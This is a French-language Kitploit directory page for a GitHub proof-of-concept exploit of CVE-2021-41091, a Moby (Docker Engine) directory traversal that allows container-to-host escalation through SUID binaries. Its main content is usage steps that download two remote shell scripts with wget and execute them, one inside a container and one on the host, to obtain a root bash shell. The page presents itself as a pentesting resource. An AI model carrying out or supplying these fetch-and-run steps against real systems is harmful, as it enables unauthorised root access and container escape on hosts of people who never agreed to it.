Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-41091 — Preuve de concept d'exploitation pour CVE-2021-41091 : traversée de répertoire dans Moby (moteur Docker) permettant à des utilisateurs non privilégiés d'exécuter des binaires SUID depuis un conteneur sur l'hôte. Comprend des scripts PoC pour Ubuntu 20.04. | Kitploit
Outils/GitHubGitHub/jrbh4ck/cve-2021-41091
Escalade de PrivilègesSécurité des ConteneursAnalyse des VulnérabilitésExploitationTests d'IntrusionÉvasion de Conteneur
GitHubjrbh4ck/cve-2021-41091

CVE-2021-41091

Preuve de concept d'exploitation pour CVE-2021-41091 : traversée de répertoire dans Moby (moteur Docker) permettant à des utilisateurs non privilégiés d'exécuter des binaires SUID depuis un conteneur sur l'hôte. Comprend des scripts PoC pour Ubuntu 20.04.

Voir le dépôt
15il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-41091

Un bug dans Moby (Docker Engine) permet aux utilisateurs non privilégiés de traverser les répertoires et d'exécuter des programmes directement depuis le docker sur la machine hôte. Si un programme suid existe dans le docker, l'utilisateur pourra l'exécuter en tant que suid sur la machine hôte.

PoC

Dans le terminal du conteneur, téléchargez le fichier docker.sh, puis exécutez-le en tant qu'utilisateur root :

wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/docker.sh
chmod +x docker.sh
./docker.sh

Maintenant, sur la machine hôte, téléchargez le fichier principal.sh et exécutez-le :

wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/principal.sh
chmod +x principal.sh
./principal.sh

Exécutez la commande qui sera fournie par le fichier et nous serons capables d'exécuter la /bin/bash en tant que root.

Notes

Ces scripts ont été testés sur Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64) avec la version de Moby 20.10.5+dfsg1.

L'UTILISATION DE CE RÉPERTOIRE EST SOUS LA RESPONSABILITÉ DE CELUI QUI L'UTILISE ET NON DE L'AUTEUR.

Télécharger l’outil